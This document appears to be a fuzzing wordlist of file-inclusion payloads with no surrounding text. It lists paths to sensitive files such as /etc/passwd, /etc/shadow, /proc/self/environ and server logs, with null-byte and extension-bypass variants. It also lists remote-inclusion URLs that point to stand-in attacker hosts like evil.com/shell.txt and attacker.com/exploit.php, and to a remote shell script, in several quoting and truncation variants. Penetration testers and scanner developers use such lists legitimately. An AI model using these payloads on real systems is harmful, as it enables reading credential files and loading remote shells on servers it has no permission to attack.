/boot.ini.conf
/boot.ini.html
/boot.ini.inc
/boot.ini.jsp
/boot.ini.log
/boot.ini.old
/boot.ini.php
/boot.ini.txt
/etc/hostname
/etc/hostname%00
/etc/hostname.%00
/etc/hostname.%00.png
/etc/hostname.asp
/etc/hostname.bak
/etc/hostname.conf
/etc/hostname.html
/etc/hostname.inc
/etc/hostname.jsp
/etc/hostname.log
/etc/hostname.old
/etc/hostname.php
/etc/hostname.txt
/etc/hosts
/etc/hosts%00
/etc/hosts.%00
/etc/hosts.%00.png
/etc/hosts.asp
/etc/hosts.bak
/etc/hosts.conf
/etc/hosts.html
/etc/hosts.inc
/etc/hosts.jsp
/etc/hosts.log
/etc/hosts.old
/etc/hosts.php
/etc/hosts.txt
/etc/passwd
/etc/passwd%00
/etc/passwd.%00
/etc/passwd.%00.png
/etc/passwd.asp
/etc/passwd.bak
/etc/passwd.conf
/etc/passwd.html
/etc/passwd.inc
/etc/passwd.jsp
/etc/passwd.log
/etc/passwd.old
/etc/passwd.php
/etc/passwd.txt
/etc/shadow
/etc/shadow%00
/etc/shadow.%00
/etc/shadow.%00.png
/etc/shadow.asp
/etc/shadow.bak
/etc/shadow.conf
/etc/shadow.html
/etc/shadow.inc
/etc/shadow.jsp
/etc/shadow.log
/etc/shadow.old
/etc/shadow.php
/etc/shadow.txt
/proc/self/environ
/proc/self/environ%00
/proc/self/environ.%00
/proc/self/environ.%00.png
/proc/self/environ.asp
/proc/self/environ.bak
/proc/self/environ.conf
/proc/self/environ.html
/proc/self/environ.inc
/proc/self/environ.jsp
/proc/self/environ.log
/proc/self/environ.old
/proc/self/environ.php
/proc/self/environ.txt
/var/log/auth.log
/var/log/auth.log%00
/var/log/auth.log.%00
/var/log/auth.log.%00.png
/var/log/auth.log.asp
/var/log/auth.log.bak
/var/log/auth.log.conf
/var/log/auth.log.html
/var/log/auth.log.inc
/var/log/auth.log.jsp
/var/log/auth.log.log
/var/log/auth.log.old
/var/log/auth.log.php
/var/log/auth.log.txt
/var/log/nginx/access.log
/var/log/nginx/access.log%00
/var/log/nginx/access.log.%00
/var/log/nginx/access.log.%00.png
/var/log/nginx/access.log.asp
/var/log/nginx/access.log.bak
/var/log/nginx/access.log.conf
/var/log/nginx/access.log.html
/var/log/nginx/access.log.inc
/var/log/nginx/access.log.jsp
/var/log/nginx/access.log.log
/var/log/nginx/access.log.old
/var/log/nginx/access.log.php
/var/log/nginx/access.log.txt
/windows/win.ini
/windows/win.ini%00
/windows/win.ini.%00
/windows/win.ini.%00.png
/windows/win.ini.asp
/windows/win.ini.bak
/windows/win.ini.conf
/windows/win.ini.html
/windows/win.ini.inc
/windows/win.ini.jsp
/windows/win.ini.log
/windows/win.ini.old
/windows/win.ini.php
/windows/win.ini.txt
\"//evil.com/shell.txt
\"//evil.com/shell.txt#
\"//evil.com/shell.txt%00
\"//evil.com/shell.txt//
\"//evil.com/shell.txt?
\"http://127.0.0.1:8000/evil
\"http://127.0.0.1:8000/evil#
\"http://127.0.0.1:8000/evil%00
\"http://127.0.0.1:8000/evil//
\"http://127.0.0.1:8000/evil?
\"http://attacker.com/exploit.php
\"http://attacker.com/exploit.php#
\"http://attacker.com/exploit.php%00
\"http://attacker.com/exploit.php//
\"http://attacker.com/exploit.php?
\"http://evil.com/shell.txt
\"http://evil.com/shell.txt#
\"http://evil.com/shell.txt%00
\"http://evil.com/shell.txt//
\"http://evil.com/shell.txt?
\"https://raw.githubusercontent.com/user/file.sh
\"https://raw.githubusercontent.com/user/file.sh#
\"https://raw.githubusercontent.com/user/file.sh%00
\"https://raw.githubusercontent.com/user/file.sh//
\"https://raw.githubusercontent.com/user/file.sh?
\'//evil.com/shell.txt
\'//evil.com/shell.txt#
\'//evil.com/shell.txt%00
\'//evil.com/shell.txt//
\'//evil.com/shell.txt?
\'http://127.0.0.1:8000/evil
\'http://127.0.0.1:8000/evil#
\'http://127.0.0.1:8000/evil%00
\'http://127.0.0.1:8000/evil//
\'http://127.0.0.1:8000/evil?
\'http://attacker.com/exploit.php
\'http://attacker.com/exploit.php#
\'http://attacker.com/exploit.php%00
\'http://attacker.com/exploit.php//
\'http://attacker.com/exploit.php?
\'http://evil.com/shell.txt
\'http://evil.com/shell.txt#
\'http://evil.com/shell.txt%00
\'http://evil.com/shell.txt//
\'http://evil.com/shell.txt?
\'https://raw.githubusercontent.com/user/file.sh
\'https://raw.githubusercontent.com/user/file.sh#
\'https://raw.githubusercontent.com/user/file.sh%00
\'https://raw.githubusercontent.com/user/file.sh//
\'https://raw.githubusercontent.com/user/file.sh?
`//evil.com/shell.txt
`//evil.com/shell.txt#
`//evil.com/shell.txt%00
`//evil.com/shell.txt//
`//evil.com/shell.txt?
`http://127.0.0.1:8000/evil
`http://127.0.0.1:8000/evil#
`http://127.0.0.1:8000/evil%00
`http://127.0.0.1:8000/evil//
`http://127.0.0.1:8000/evil?
`http://attacker.com/exploit.php
`http://attacker.com/exploit.php#
`http://attacker.com/exploit.php%00
`http://attacker.com/exploit.php//
`http://attacker.com/exploit.php?
`http://evil.com/shell.txt
`http://evil.com/shell.txt#
`http://evil.com/shell.txt%00
`http://evil.com/shell.txt//
`http://evil.com/shell.txt?
`https://raw.githubusercontent.com/user/file.sh
`https://raw.githubusercontent.com/user/file.sh#
`https://raw.githubusercontent.com/user/file.sh%00
`https://raw.githubusercontent.com/user/file.sh//
`https://raw.githubusercontent.com/user/file.sh?
http://127.0.0.1:8000/evil
http://127.0.0.1:8000/evil#
http://127.0.0.1:8000/evil%00
http://127.0.0.1:8000/evil//
http://127.0.0.1:8000/evil?
http://attacker.com/exploit.php
http://attacker.com/exploit.php#
http://attacker.com/exploit.php%00
http://attacker.com/exploit.php//
http://attacker.com/exploit.php?
http://evil.com/shell.txt
http://evil.com/shell.txt#
http://evil.com/shell.txt%00
http://evil.com/shell.txt//
http://evil.com/shell.txt?
https://raw.githubusercontent.com/user/file.sh
https://raw.githubusercontent.com/user/file.sh#
https://raw.githubusercontent.com/user/file.sh%00
https://raw.githubusercontent.com/user/file.sh//
https://raw.githubusercontent.com/user/file.sh?
